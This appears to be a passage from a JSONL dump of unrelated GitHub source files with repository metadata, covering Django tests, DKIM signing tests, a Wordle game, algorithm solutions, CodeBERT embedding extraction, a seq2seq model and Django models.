test_context(self, response)\n\n def test_unfollowing(self):\n response = self.client2.get(reverse(\n 'profile_unfollow',\n args=[self.user.username]\n ),\n follow=True\n )\n self.assertEqual(False, response.context['following'])\n response = self.client2.get(reverse('follow_index'))\n self.assertEqual(0, len(response.context['page']))\n\n# Только авторизированный пользователь может комментировать посты\n def test_comment_not_authorized_user(self):\n self.client2.logout()\n response = self.client2.post(reverse(\n 'add_comment',\n args=[self.user.username, Post.objects.first().id],\n ),\n {'text': 'Hi, mom'},\n follow=True\n )\n self.assertEqual(\n response.redirect_chain,\n [(\n f'/auth/login/?next=/{self.user.username}'\n f'/{Post.objects.first().id}/comment/',\n 302\n )]\n )\n self.assertEqual(Comment.objects.all().count(), 0)\n\n\nclass TestImages(TestCase):\n def setUp(self):\n self.client = Client()\n self.user = User.objects.create_user(\n username=\"sarah\",\n email='s.conor@mail.ru',\n password='234567Abc'\n )\n self.client.force_login(self.user)\n self.group = Group.objects.create(title='testgroup', slug='testgroup')\n self.post = Post.objects.create(\n text='Test post',\n author=self.user,\n group=self.group)\n\n def test_images(self):\n img = Image.new('RGB', (100, 200))\n img.save('media/image.jpg')\n with open('media/image.jpg', 'rb') as img:\n response = self.client.post(reverse(\n 'post_edit',\n args=[\n self.user.username,\n Post.objects.first().id\n ]\n ),\n {\n 'text': 'Test post with img',\n 'image': img\n },\n follow=True\n )\n self.assertIn(' n:\n break\n if nj > m:\n break\n add = (path[k] * p[n-i-1][k-1]) % mod\n add = (add * dp[i][j]) % mod\n dp[ni][nj] += add\n dp[ni][nj] =(dp[ni][nj]) % mod\n #dp[ni][nj] += (((dp[i][j] * path[k]) % mod) * p[n - i - 1][k - 1]) % mod\n #dp[ni][nj] %= mod\n for k in range(2,l+1):\n ni = k + i\n nj = k + j\n if ni > n:\n break\n if nj > m:\n break\n add = (cycle[k] * p[n-i-1][k-1]) % mod\n add = (add * dp[i][j]) % mod\n dp[ni][nj] += add\n dp[ni][nj] =(dp[ni][nj]) % mod\n #dp[ni][nj] += (((dp[i][j] * cycle[k]) % mod) * p[n - i - 1][k - 1]) % mod\n #dp[ni][nj] %= mod\n return dp[n][m]\n\nans = (f(n,m,l)-f(n,m,l-1)) % mod\nprint(int(ans)) ","repo_name":"momomorgentau/code","sub_path":"atcoder/abc/abc180/f_unbranched.py","file_name":"f_unbranched.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"6058154127","text":"import os.path\nimport tempfile\nimport unittest\n\nimport dkim\nimport dkim.dknewkey as dknewkey\n\ndef read_data(path):\n \"\"\"Get the content of the given test data file.\"\"\"\n\n with open(path, 'rb') as f:\n return f.read()\n\n\nclass TestSignAndVerify(unittest.TestCase):\n \"\"\"End-to-end signature and verification tests with a generated key.\"\"\"\n\n def setUp(self):\n message_dir = os.path.join(os.path.dirname(__file__), 'data', \"test.message\")\n self.message = read_data(message_dir)\n self.ed25519_dns_key_file = \"\"\n self.rsa_dns_key_file = \"\"\n \n\n def test_generate_verifies_new_RSA_key(self):\n #Create temporary dir\n tmpdir = tempfile.TemporaryDirectory()\n keydir = tmpdir.name\n rsa_key_file = os.path.join(keydir, \"dkim.rsa.key\")\n self.rsa_dns_key_file = os.path.join(keydir, \"dkim.rsa.key.pub.txt\")\n #Generate a rsa key\n dknewkey.GenRSAKeys(rsa_key_file, False)\n dknewkey.ExtractRSADnsPublicKey(rsa_key_file, self.rsa_dns_key_file, False)\n #Load the key\n rsakey = read_data(rsa_key_file)\n 
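#Note (added): the nested loops below sign and verify the message under all
#four header/body canonicalization combinations defined by the DKIM spec
#(RFC 6376), simple/relaxed x simple/relaxed, resolving the public key via
#the dnsfuncRSA stub instead of a live DNS lookup.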
#Test signature with the newely generated key \n for header_algo in (b\"simple\", b\"relaxed\"):\n for body_algo in (b\"simple\", b\"relaxed\"):\n sig = dkim.sign(\n self.message, b\"test\", b\"example.com\", rsakey,\n canonicalize=(header_algo, body_algo))\n res = dkim.verify(sig + self.message, dnsfunc=self.dnsfuncRSA)\n self.assertTrue(res)\n tmpdir.cleanup()\n\n\n def test_generate_verifies_Ed25519_key(self):\n #Create temporary dir\n tmpdir = tempfile.TemporaryDirectory()\n keydir = tmpdir.name\n ed25519_key_file = os.path.join(keydir, \"dkim.ed25519.key\")\n self.ed25519_dns_key_file = os.path.join(keydir, \"dkim.ed25519.key.pub.txt\")\n #Generate a ed25519 key\n pkt = dknewkey.GenEd25519Keys(ed25519_key_file, False)\n dknewkey.ExtractEd25519PublicKey(self.ed25519_dns_key_file, pkt, False)\n #Load the key\n ed25519key = read_data(ed25519_key_file)\n #Test signature with the newely generated key \n for header_algo in (b\"simple\", b\"relaxed\"):\n for body_algo in (b\"simple\", b\"relaxed\"):\n sig = dkim.sign(\n self.message, b\"test1\", b\"example.com\", ed25519key,\n signature_algorithm=b'ed25519-sha256',\n canonicalize=(header_algo, body_algo))\n res = dkim.verify(sig + self.message, dnsfunc=self.dnsfuncED25519)\n self.assertTrue(res)\n tmpdir.cleanup()\n\n\n def dnsfuncRSA(self, domain, timeout=5):\n _dns_responses = {\n 'test._domainkey.example.com.': read_data(self.rsa_dns_key_file),\n }\n try:\n domain = domain.decode('ascii')\n except UnicodeDecodeError:\n return None\n self.assertTrue(domain in _dns_responses,domain)\n return _dns_responses[domain]\n\n def dnsfuncED25519(self, domain, timeout=5):\n _dns_responses = {\n 'test1._domainkey.example.com.': read_data(self.ed25519_dns_key_file),\n }\n try:\n domain = domain.decode('ascii')\n except UnicodeDecodeError:\n return None\n self.assertTrue(domain in _dns_responses,domain)\n return _dns_responses[domain]\n\n \n\ndef test_suite():\n from unittest import TestLoader\n return TestLoader().loadTestsFromName(__name__)\n","repo_name":"jauderho/dkimpy","sub_path":"dkim/tests/test_dkim_generate.py","file_name":"test_dkim_generate.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"36916045276","text":"import random\nimport re\nfrom word_work import get_all_words, get_possible_words \n\nyellow_box = u\"\\U0001f7e8\"\ngreen_box = u\"\\U0001f7e9\"\ngrey_box = u\"\\u2b1c\"\n\ndef pick_winning_word():\n words = get_possible_words()\n random.seed()\n i = random.randrange(len(words))\n return words[i]\n\ndef read_guess():\n valid = False\n print(\"Please guess a 5 letter word:\")\n while not valid:\n word = input()\n if len(word) != 5:\n print(\"Word must be 5 letter long\")\n elif word not in get_all_words():\n print(\"Not a valid word\")\n else:\n valid = True\n return word\n\ndef print_result(word, states):\n string = \"\"\n for i, l in enumerate(word):\n if states[i] == 'correct':\n string += '\\033[42m' + l + '\\033[0m'\n elif states[i] == 'present':\n string += '\\033[43m' + l + '\\033[0m'\n else:\n string += l\n return string\n\ndef get_pattern(results):\n text = f\"Wordle {len(results)}/6\\n\"\n for r in results:\n #print(f\"row: {r}\")\n for c in r[1]:\n if c == 'correct':\n text += green_box\n elif c == 'present':\n text += yellow_box\n else:\n text += grey_box\n text += '\\n'\n return text\n\n\ndef compare_guess(winning_word, guess):\n results = ['absent'] * 5\n letters = []\n \n for i, c in enumerate(guess):\n if 
winning_word[i] == c:\n            results[i] = 'correct'\n        else:\n            letters.append(winning_word[i])\n\n    #print(f\"remaining letters {letters}\")\n    for i, c in enumerate(guess):\n        if results[i] == 'absent':\n            if c in letters:\n                results[i] = 'present'\n                letters.remove(c)\n\n    return results\n\ndef result_done(result):\n    for r in result:\n        if r != 'correct':\n            return False\n    return True\n\ndef main():\n    winning_word = pick_winning_word()\n    #print(f\"Winning word is {winning_word}\")\n\n    won = False\n\n    for i in range(6):\n        guess = read_guess()\n        result = compare_guess(winning_word, guess)\n        print(print_result(guess, result))\n        if result_done(result):\n            won = True\n            print(\"Congrats!!!!\")\n            break\n\n    if not won:\n        print(f\"Failed, the word was {winning_word}\")\n\nif __name__ == \"__main__\":\n    main()","repo_name":"benpayne/wordle_bot","sub_path":"flask-server/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"37295803341","text":"'''\nSuppose an array sorted in ascending order is rotated at some pivot unknown\nto you beforehand.\n\n(For example, [0,0,1,2,2,5,6] might become [2,5,6,0,0,1,2].)\n\nWrite a function to determine whether a given target value exists in the\narray. Return true if it does, otherwise return false.\n\nExample 1:\n\nInput: nums = [2,5,6,0,0,1,2], target = 0\nOutput: true\nExample 2:\n\nInput: nums = [2,5,6,0,0,1,2], target = 3\nOutput: false\nFollow-up:\n\nThis extends \"Search in Rotated Sorted Array\": here nums may contain\nduplicates. Does that affect the time complexity? How, and why?\n'''\nfrom typing import List\n\n\nclass Solution:\n    def search(self, nums: List[int], target: int) -> bool:\n        left, right = 0, len(nums) - 1\n        while left <= right:\n            mid = (left + right) >> 1\n            value = nums[mid]\n            if target == value:\n                return True\n            if nums[left] < value:  # mid is in the left, sorted part\n                if nums[left] <= target < value:\n                    right = mid - 1\n                else:\n                    left = mid + 1\n            elif nums[right] > value:  # mid is in the right, sorted part\n                if value < target <= nums[right]:\n                    left = mid + 1\n                else:\n                    right = mid - 1\n            else:  # shrink past duplicates\n                if nums[left] == value:\n                    left += 1\n                if nums[right] == value:\n                    right -= 1\n\n        return False\n\n\nif __name__ == '__main__':\n    nums = [1, 0, 1, 1, 1]\n    target = 0\n    sol = Solution()\n    print(sol.search(nums, target))\n","repo_name":"Asunqingwen/LeetCode","sub_path":"Cookbook/Array/搜索旋转排序数组 II.py","file_name":"搜索旋转排序数组 II.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"19921246746","text":"import copy\nimport os\nimport json\nimport sys\nimport torch\nimport argparse\nfrom tqdm import tqdm\nimport numpy as np\nsys.path.append('../../../')\nsys.path.append('../../../python_parser')\nfrom python_parser.run_parser import get_identifiers, remove_comments_and_docstrings, get_example, get_example_batch\nfrom transformers import RobertaConfig, RobertaForSequenceClassification, RobertaTokenizer, RobertaForMaskedLM\nfrom model import CodeBERT, GraphCodeBERT\nfrom run import CodeBertTextDataset, GraphCodeBertTextDataset\nfrom utils import _tokenize\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\n\nMODEL_CLASSES = {\n    'roberta': (RobertaConfig, RobertaForSequenceClassification, RobertaTokenizer)\n}\n\n\ndef get_embeddings(code, variables, tokenizer_mlm, codebert_mlm, args):\n    new_code = copy.deepcopy(code)\n    chromesome = {}\n    for i in variables:\n        chromesome[i] = ''\n    new_code = get_example_batch(new_code, chromesome, \"c\")\n    _, _, code_tokens = get_identifiers(remove_comments_and_docstrings(new_code, \"c\"), \"c\")\n    processed_code = \" \".join(code_tokens)\n    words, sub_words, keys =
_tokenize(processed_code, tokenizer_mlm)\n sub_words = [tokenizer_mlm.cls_token] + sub_words[:args.block_size - 2] + [tokenizer_mlm.sep_token]\n input_ids_ = torch.tensor([tokenizer_mlm.convert_tokens_to_ids(sub_words)])\n with torch.no_grad():\n embeddings = codebert_mlm.roberta(input_ids_.to('cuda'))[0]\n\n return embeddings\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--all_data_file\", default=None, type=str,\n help=\"All data file (a text file).\")\n parser.add_argument(\"--cache_dir\", default=\"\", type=str,\n help=\"Optional directory to store the pre-trained models downloaded from s3 (instread of the default one)\")\n parser.add_argument(\"--config_name\", default=\"\", type=str,\n help=\"Optional pretrained config name or path if not the same as model_name_or_path\")\n parser.add_argument(\"--model_name\", default=\"\", type=str,\n help=\"model name.\")\n\n args = parser.parse_args()\n args.device = torch.device(\"cuda\")\n args.output_dir = '../code/saved_models'\n args.model_type = 'roberta'\n args.eval_batch_size = 64\n args.block_size = 512\n args.store_path = './dataset/%s_all_subs.json' % args.model_name\n\n if args.model_name == 'codebert':\n args.tokenizer_name = 'microsoft/codebert-base-mlm'\n args.model_name_or_path = 'microsoft/codebert-base-mlm'\n args.base_model = 'microsoft/codebert-base-mlm'\n elif args.model_name == 'graphcodebert':\n args.code_length = 448\n args.data_flow_length = 64\n args.tokenizer_name = 'microsoft/graphcodebert-base'\n args.model_name_or_path = 'microsoft/graphcodebert-base'\n args.base_model = 'microsoft/graphcodebert-base'\n\n config_class, model_class, tokenizer_class = MODEL_CLASSES[args.model_type]\n config = config_class.from_pretrained(args.config_name if args.config_name else args.model_name_or_path,\n cache_dir=args.cache_dir if args.cache_dir else None)\n config.num_labels = 1\n tokenizer = tokenizer_class.from_pretrained(args.tokenizer_name,\n do_lower_case=False,\n cache_dir=args.cache_dir if args.cache_dir else None)\n if args.block_size <= 0:\n args.block_size = tokenizer.max_len_single_sentence\n args.block_size = min(args.block_size, tokenizer.max_len_single_sentence)\n if args.model_name_or_path:\n model = model_class.from_pretrained(args.model_name_or_path,\n from_tf=bool('.ckpt' in args.model_name_or_path),\n config=config,\n cache_dir=args.cache_dir if args.cache_dir else None)\n else:\n model = model_class(config)\n\n if args.model_name == 'codebert':\n model = CodeBERT(model, config, tokenizer, args)\n all_dataset = CodeBertTextDataset(tokenizer, args, args.all_data_file)\n elif args.model_name == 'graphcodebert':\n model = GraphCodeBERT(model, config, tokenizer, args)\n all_dataset = GraphCodeBertTextDataset(tokenizer, args, args.all_data_file)\n checkpoint_prefix = 'checkpoint-best-acc/%s_model.bin' % args.model_name\n output_dir = os.path.join(args.output_dir, '{}'.format(checkpoint_prefix))\n model.load_state_dict(torch.load(output_dir))\n model.to(args.device)\n\n codebert_mlm = RobertaForMaskedLM.from_pretrained(args.base_model)\n codebert_mlm.to(args.device)\n tokenizer_mlm = RobertaTokenizer.from_pretrained(args.base_model)\n\n source_codes = []\n with open(args.all_data_file) as f:\n for line in f:\n js = json.loads(line.strip())\n code = js['func']\n source_codes.append(code)\n assert (len(source_codes) == len(all_dataset))\n print('length of all data', len(source_codes))\n\n all_labels = {}\n with open(args.store_path, \"w\") as wf:\n for index, example in 
enumerate(tqdm(all_dataset)):\n logits, preds = model.get_results([example], args.eval_batch_size)\n\n if args.model_name == 'codebert':\n true_label = str(int(example[1].item()))\n elif args.model_name == 'graphcodebert':\n true_label = str(int(example[3].item()))\n\n orig_prob = np.max(logits[0])\n orig_label = str(int(preds[0]))\n\n if not true_label == orig_label:\n continue\n\n if true_label not in all_labels.keys():\n all_labels[true_label] = []\n\n variable_name, function_name, _ = get_identifiers(remove_comments_and_docstrings(source_codes[index], \"c\"), \"c\")\n\n code = source_codes[index]\n embeddings = get_embeddings(code, variable_name+function_name, tokenizer_mlm, codebert_mlm, args)\n\n np.save('./dataset/%s_all_subs/%s_%s' % (args.model_name, str(orig_label), str(index)), embeddings.cpu().numpy())\n all_labels[true_label].append({'code': code, 'embeddings_index': index, 'variable_name': variable_name, 'function_name': function_name})\n wf.write(json.dumps(all_labels) + '\\n')\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"tianzhaotju/CODA","sub_path":"test/VulnerabilityPrediction/dataset/get_reference.py","file_name":"get_reference.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"90"} +{"seq_id":"20012160681","text":"import json\nimport os\nimport pymongo\nimport pytest\nfrom pymongo.collection import Collection\nfrom songs.app import create_app\nfrom songs.extensions import mongo\n\nHERE = os.path.abspath(os.path.dirname(__file__))\nPROJECT_ROOT = os.path.join(HERE, os.pardir)\nTEST_PATH = os.path.join(PROJECT_ROOT, \"tests\")\n\n\n@pytest.fixture()\ndef app():\n \"\"\"\n Use test database.\n Create songs collection, import the data from songs.json and remove it afterwards.\n \"\"\"\n app = create_app('tests.settings')\n app.config.update({\n \"TESTING\": True,\n })\n \n mongo.db.drop_collection('songs')\n mongo.db.create_collection('songs')\n songs: Collection = mongo.db.songs\n \n with open(os.path.join(PROJECT_ROOT, 'tests', 'songs.json')) as f:\n songs_data = map(lambda x: json.loads(x), f.readlines())\n \n songs.insert_many(songs_data)\n\n songs.create_index([('title', pymongo.TEXT), ('artist', pymongo.TEXT)])\n songs.create_index([('released', pymongo.ASCENDING)])\n\n yield app\n\n mongo.db.drop_collection('songs')\n\n\n@pytest.fixture()\ndef client(app):\n return app.test_client()\n\n\n@pytest.fixture()\ndef runner(app):\n return app.test_cli_runner()\n","repo_name":"dkarpushkin/TheSongsFlaskMongo","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18436899369","text":"import sys\nlines = [s.rstrip(\"\\n\") for s in sys.stdin.readlines()]\na, b, k = [int(num) for num in lines.pop(0).split(\" \")]\ncount = 0\nfor n in range(min(a, b), 0, -1):\n if (a % n == 0) and (b % n == 0):\n count += 1\n if count == k:\n break\nprint(n)\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03106/s785862446.py","file_name":"s785862446.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18466473229","text":"import sys\nsys.setrecursionlimit(10000000)\ndef input():\n return sys.stdin.readline()[:-1]\nfrom collections import *\nimport math\nfrom bisect import *\nINF = float('inf')\n\nN, K = map(int, 
input().split())\na = list(map(int, input().split()))\ndp = [0] * (K+1)\nfor i in range(K+1):\n    for j in range(N):\n        if a[j] <= i:\n            dp[i] |= dp[i-a[j]] == 0\nans = 'First' if dp[K] else 'Second'\nprint(ans)\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03170/s401036684.py","file_name":"s401036684.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17927671605","text":"#!/usr/bin/env python\n# coding: utf-8\nimport sys\nsys.path.append('..')\nimport numpy as np\nfrom chapter7.seq2seq import Seq2seq\nfrom common.time_layers import TimeEmbedding, TimeLSTM, TimeAffine,\\\n    TimeSoftmaxWithLoss\nfrom common.base_model import BaseModel\n\n\nclass Encoder:\n    def __init__(self, vocab_size, wordvec_size, hidden_size):\n        '''\n        vocab_size: vocabulary size\n        wordvec_size: dimensionality of the character vectors\n        hidden_size: dimensionality of the LSTM hidden-state vectors\n        '''\n        V, D, H = vocab_size, wordvec_size, hidden_size\n        rn = np.random.randn\n\n        embed_W = (rn(V, D) / 100).astype('f')\n        lstm_Wx = (rn(D, 4 * H) / np.sqrt(D)).astype('f')\n        lstm_Wh = (rn(H, 4 * H) / np.sqrt(H)).astype('f')\n        lstm_b = np.zeros(4 * H).astype('f')\n\n        self.embed = TimeEmbedding(embed_W)\n        self.lstm = TimeLSTM(lstm_Wx, lstm_Wh, lstm_b, stateful=False)\n\n        self.params = self.embed.params + self.lstm.params\n        self.grads = self.embed.grads + self.lstm.grads\n        self.hs = None\n\n    def forward(self, xs):\n        # return the last hidden state\n        xs = self.embed.forward(xs)\n        hs = self.lstm.forward(xs)\n        self.hs = hs\n        return hs[:, -1, :]\n\n    def backward(self, dh):\n        # the input dh is the gradient with respect to the last hidden state\n        dhs = np.zeros_like(self.hs)\n        dhs[:, -1, :] = dh\n\n        dout = self.lstm.backward(dhs)\n        dout = self.embed.backward(dout)\n        return dout\n\n\nclass PeekyDecoder:\n    def __init__(self, vocab_size, wordvec_size, hidden_size):\n        V, D, H = vocab_size, wordvec_size, hidden_size\n        rn = np.random.randn\n\n        embed_W = (rn(V, D) / 100).astype('f')\n        lstm_Wx = (rn(H + D, 4 * H) / np.sqrt(H + D)).astype('f')\n        lstm_Wh = (rn(H, 4 * H) / np.sqrt(H)).astype('f')\n        lstm_b = np.zeros(4 * H).astype('f')\n        affine_W = (rn(H + H, V) / np.sqrt(H + H)).astype('f')\n        affine_b = np.zeros(V).astype('f')\n\n        self.embed = TimeEmbedding(embed_W)\n        self.lstm = TimeLSTM(lstm_Wx, lstm_Wh, lstm_b, stateful=True)\n        self.affine = TimeAffine(affine_W, affine_b)\n\n        self.params, self.grads = [], []\n\n        for layer in (self.embed, self.lstm, self.affine):\n            self.params += layer.params\n            self.grads += layer.grads\n        self.cache = None\n\n    def forward(self, xs, h):\n        N, T = xs.shape\n        N, H = h.shape\n\n        self.lstm.set_state(h)\n\n        out = self.embed.forward(xs)\n        hs = np.repeat(h, T, axis=0).reshape(N, T, H)\n        out = np.concatenate((hs, out), axis=2)\n\n        out = self.lstm.forward(out)\n        out = np.concatenate((hs, out), axis=2)\n\n        score = self.affine.forward(out)\n        self.cache = H\n        return score\n\n    def backward(self, dscore):\n        H = self.cache\n\n        dout = self.affine.backward(dscore)\n        dout, dhs0 = dout[:, :, H:], dout[:, :, :H]\n        dout = self.lstm.backward(dout)\n        dembed, dhs1 = dout[:, :, H:], dout[:, :, :H]\n        self.embed.backward(dembed)\n\n        dhs = dhs0 + dhs1\n        dh = self.lstm.dh + np.sum(dhs, axis=1)\n        return dh\n\n    def generate(self, h, start_id, sample_size):\n        '''\n        h: hidden state received from the Encoder\n        start_id: the first character ID to feed in\n        sample_size: number of characters to generate\n        '''\n        sampled = []\n        sample_id = start_id\n        self.lstm.set_state(h)\n\n        for _ in range(sample_size):\n            x = np.array(sample_id).reshape((1, 1))\n            out = self.embed.forward(x)\n            out = self.lstm.forward(out)\n            score =
self.affine.forward(out)\n\n sample_id = np.argmax(score.flatten())\n sampled.append(int(sample_id))\n\n return sampled\n\n\nclass PeekySeq2seq(Seq2seq):\n def __init__(self, vocab_size, wordvec_size, hidden_size):\n V, D, H = vocab_size, wordvec_size, hidden_size\n self.encoder = Encoder(V, D, H)\n self.decoder = PeekyDecoder(V, D, H)\n self.softmax = TimeSoftmaxWithLoss()\n\n self.params = self.encoder.params + self.decoder.params\n self.grads = self.encoder.grads + self.decoder.grads\n","repo_name":"MATOBAD/NLP","sub_path":"chapter7/peeky_seq2seq.py","file_name":"peeky_seq2seq.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18055632219","text":"import sys\nfrom collections import deque\n\ninput = sys.stdin.readline\n\n\ndef main():\n X = input().rstrip()\n\n stack = deque()\n for x in X:\n if len(stack) == 0:\n stack.append(x)\n else:\n if x == \"S\":\n stack.append(x)\n else:\n if stack[-1] == \"S\":\n stack.pop()\n else:\n stack.append(x)\n ans = len(stack)\n\n print(ans)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03986/s439214462.py","file_name":"s439214462.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"71880605416","text":"#!/usr/bin/env python3\n\"\"\"\nAndrew Patrick - apatric1\nProg Fundamentals: Python\nHomework 05: Task:\n Write a program that prints out the command line arguments\n it receives, in reverse order from last to first.\n\"\"\"\n# This test uses string methods, no loops (shorter, faster?)\n# using sys.argv to access command line arguments\nimport sys\n# pop 0 from sys.argv then join reversed\narguments = sys.argv\narguments.pop(0)\nprint(' '.join(reversed(arguments)))\n","repo_name":"drew1701/ccsf_cs131b","sub_path":"apatric1_hw05c.py","file_name":"apatric1_hw05c.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"74874128936","text":"from __future__ import annotations\n\nimport smtplib\nimport ssl\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom operator import attrgetter\n\nfrom typing import TYPE_CHECKING\nif TYPE_CHECKING:\n from typing import List\n from shout_ahead.AgentPool import AgentPool\n\n\nclass Notifier:\n def __init__(self, email: str, password: str, recipients: List[str], id: str) -> None:\n self.email = email\n self.password = password\n self.recipients = recipients\n self.id = id\n\n def sendEmail(self, subject: str, content: str) -> None:\n port = 465\n context = ssl.create_default_context()\n message = MIMEMultipart(\"alternative\")\n message[\"Subject\"] = f\"ASP VM: {self.id} {subject}\"\n message[\"From\"] = self.email\n\n message.attach(MIMEText(content, \"plain\"))\n with smtplib.SMTP_SSL(\"smtp.gmail.com\", port, context=context) as server:\n server.login(self.email, self.password)\n for recipient in self.recipients:\n message['To'] = recipient\n server.sendmail(self.email, recipient, message.as_string())\n\n def run(self, agentPools: List[AgentPool], generationRuntimes: List[float], episodeRuntimes: List[float], totalGenerations: int):\n genTime = generationRuntimes[-1]\n averageGenTime = sum(generationRuntimes) / len(generationRuntimes)\n generations = len(generationRuntimes)\n averageEpisodeTime = sum(episodeRuntimes) 
/ len(episodeRuntimes)\n episodes = len(episodeRuntimes)\n\n # Create new output file and add generation runtime information\n message = \"\"\n message += f\"Generation {generations} Stats\\n\\n\"\n message += f\"Generation runtime: {genTime}\\n\"\n message += f\"Average generation runtime: {averageGenTime}\\n\"\n message += f\"Average episode runtime: {averageEpisodeTime}\\n\"\n message += f\"Episodes: {episodes}\\n\"\n message += \"\\n---------------------------\\n\\n\"\n message += \"Best Individuals per Agent Pool\\n\\n\"\n\n for ap in agentPools:\n actionSet = \"\"\n for a in ap.getActionSet()[:-1]:\n actionSet += f\"{a}, \"\n actionSet += ap.getActionSet()[-1]\n\n message += f\"ID: {ap.getID()}\\n\"\n message += f\"Action set: {', '.join(ap.getActionSet())}\\n\"\n\n individuals = ap.getIndividualsSet()\n topIndividual = min(individuals, key=attrgetter('fitness'))\n message += f\"Top individual fitness: {topIndividual.getFitness()}\"\n\n nonZeroRules = {\n \"RS\": [str(r) for r in topIndividual.getRS() if r.getWeight() != 0],\n \"RSint\": [str(r) for r in topIndividual.getRSint() if r.getWeight() != 0],\n }\n for ruleSet in nonZeroRules:\n if nonZeroRules[ruleSet] == []:\n continue\n message += f\"\\n\\n{ruleSet}\\n\"\n for rule in nonZeroRules[ruleSet]:\n message += rule\n message += \"\\n\\n*************************\\n\\n\"\n\n self.sendEmail(f\"Gen {generations} of {totalGenerations} complete!\", message)\n","repo_name":"xuchef/shout-ahead-EV-preemption","sub_path":"output_management/Notifier.py","file_name":"Notifier.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17962899849","text":"S=input()\nl=[0]*26\nfor i in range(len(S)):\n l[ord(S[i])-97]+=1\nfor j in range(26):\n if l[j]==0:\n print(chr(j+97))\n break\nelse:\n print(\"None\")","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03624/s596418977.py","file_name":"s596418977.py","file_ext":"py","file_size_in_byte":150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"37295803341","text":"\"\"\"\ncalculating predictions at the end of the training\n\"\"\"\n\nimport pandas as pd\nimport torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader\n\nfrom config import config\nfrom utils.computing_device import get_device\nfrom utils.logging import get_logger\n\nlogger = get_logger(__name__)\n\n\ndef save_predictions(model: nn.Module, train_loader: DataLoader, val_loader: DataLoader) -> None:\n \"\"\"\n Save predictions as csv dataframes\n :param model:\n :param train_loader:\n :param val_loader:\n :return:\n \"\"\"\n logger.info(\"prediction saving: START\")\n predictions_message = config.get_prediction_msg()\n target_dir = config.get_exp_dir()\n load_model_best_params(model)\n\n device = get_device()\n with torch.no_grad():\n for phase, data_loader in zip([\"train\", \"val\"], [train_loader, val_loader]):\n n_batches = len(data_loader)\n true_labels, predicted_labels = [], []\n for batch_idx, (inputs, targets) in enumerate(data_loader, 1):\n inputs = inputs.to(device)\n outputs = model(inputs)\n true_labels.extend(targets.tolist())\n predicted_labels.extend(outputs.max(1).indices.tolist())\n\n logger.info(predictions_message.format(batch_idx, n_batches))\n\n results = pd.DataFrame(data={\"reference\": true_labels, \"predicted\": predicted_labels})\n\n results.to_csv(target_dir / f\"predictions_{phase}.csv\", index=False)\n 
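    # Hypothetical follow-up (added, not part of the original module): per-phase
    # accuracy can be recovered from the CSVs written above with pandas, e.g.
    #
    #     df = pd.read_csv(target_dir / "predictions_val.csv")
    #     accuracy = (df["reference"] == df["predicted"]).mean()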
logger.info(\"prediction saving: END\")\n\n\ndef load_model_best_params(model: nn.Module) -> None:\n \"\"\"\n Load model best params\n :param model:\n :return:\n \"\"\"\n best_model_path = config.get_best_model_file()\n model_state_dict = torch.load(best_model_path)[\"model\"]\n model.load_state_dict(model_state_dict)\n model.eval()\n","repo_name":"sofglide/lesion-diagnosis","sub_path":"src/saving/predictions.py","file_name":"predictions.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"36874904497","text":"from django.db import models\nfrom django.contrib.auth.models import User\nimport datetime\n\n\nclass Contact_Us(models.Model):\n name = models.CharField(max_length=250)\n contact_number = models.IntegerField(blank=True, unique=True)\n subject = models.CharField(max_length=250)\n message = models.TextField()\n added_on = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name_plural = \"Contact Us\"\n\n\nclass Category(models.Model):\n cat_name = models.CharField(max_length=250)\n cover_pic = models.FileField(upload_to=\"media/%Y/%m/%d\")\n description = models.TextField()\n added_on = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.cat_name\n\n\nclass register_table(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n contact_number = models.BigIntegerField()\n profile_pic = models.ImageField(\n upload_to=\"profiles/%Y/%m/%d\", null=True, blank=True)\n age = models.CharField(max_length=250, null=True, blank=True)\n city = 